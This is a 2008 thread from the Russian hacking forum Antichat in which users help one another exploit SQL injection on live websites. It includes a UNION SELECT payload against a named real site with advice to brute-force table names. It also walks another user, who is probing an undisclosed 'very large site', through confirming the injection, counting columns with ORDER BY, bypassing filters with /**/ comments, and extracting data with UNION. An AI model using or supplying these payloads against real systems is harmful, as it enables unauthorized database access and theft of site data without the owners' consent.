ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.02.2008, 16:52
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Код:
http://x-time.ru/cgi-bin/sonnik.cgi?act=char&val=%22+union+select+1,2+FROM+TABLE/*
т.е. в место TABLE перебираешь возможные варианты |
|
|
01.02.2008, 17:07
|
|
Новичок
Регистрация: 05.01.2008
Сообщений: 6
Провел на форуме:
95091
Репутация:
3
|
|
159932 и it's my, спасибо за помощь.
|
|
|
|
02.02.2008, 15:04
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286
Репутация:
728
|
|
host/index.php?id='
выдает :
Код:
Тип ошибки: Невозможно выполнить запрос.
Текст запроса: SELECT * FROM cats WHERE id=\'
Ошибка mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
это скуль ?)
|
|
|
|
02.02.2008, 15:25
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040
Репутация:
177
|
|
не всегда, открой страницу с существующим id и подставь
+order+by+150/* а потом
+order+by+1/* и если есть разница между отображаемыми страницами, то это точно скуль
|
|
|
|
02.02.2008, 18:04
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286
Репутация:
728
|
|
Сообщение от vp$
не всегда, открой страницу с существующим id и подставь
+order+by+150/* а потом
+order+by+1/* и если есть разница между отображаемыми страницами, то это точно скуль
Код:
Тип ошибки: Невозможно выполнить запрос.
Текст запроса: SELECT * FROM cats WHERE pid=1588 order by 150/*
Ошибка mysql: Unknown column '150' in 'order clause'
host/index.php?id=1588+order+by+1/*
Выдает страницу с id=1588
=\
Насколько понятно - скуль есть , но только количество полей подобрать не могу 
|
|
|
|
02.02.2008, 22:06
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454
Репутация:
142
|
|
давай линк на сайт, глянем
|
|
|
|
05.02.2008, 21:11
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286
Репутация:
728
|
|
Сообщение от bobob
давай линк на сайт, глянем
не могу очень крупный сайт  )
лан ... буду розбираться )
|
|
|
|
05.02.2008, 22:47
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909
Репутация:
200
|
|
Выдает страницу с id=1588
=\Насколько понятно - скуль есть , но только количество полей подобрать не могу
_-Ramos-_, у самого такое несолько раз бывало!Иногда спасал обход фильтрации типа /**/.
Еще попробуй через and (example: ?id=1588/**/and/**/1=2/**/order/)
Последний раз редактировалось A2GIL; 05.02.2008 в 22:49..
|
|
|
|
05.02.2008, 23:25
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Что за фигню все пишете тут? Ramos, попробуй host/index.php?id=1588 и host/index.php?id=1589-1
Если страницы совпадают - есть инъекция. Если нет - то инъекции нет, а может быть, параметр расценивается как строка и там фильтр.
ЗЫ если учесть то, какая ошибка тебе вылетела - скуль есть. С помощью order by подбираешь количество столбцов в запросе, потом с помощью union и циферок находишь где выводятся эти столбцы, ну и реализуешь.
Последний раз редактировалось Macro; 05.02.2008 в 23:30..
|
|
|
|
05.02.2008, 23:59
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
_-Ramos-_ ты лучше определи что это за скрипт такой, может известный скрипт, а потом дуй на багтракю смотреть скуль- поверь так больше шансов что не будет облома
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
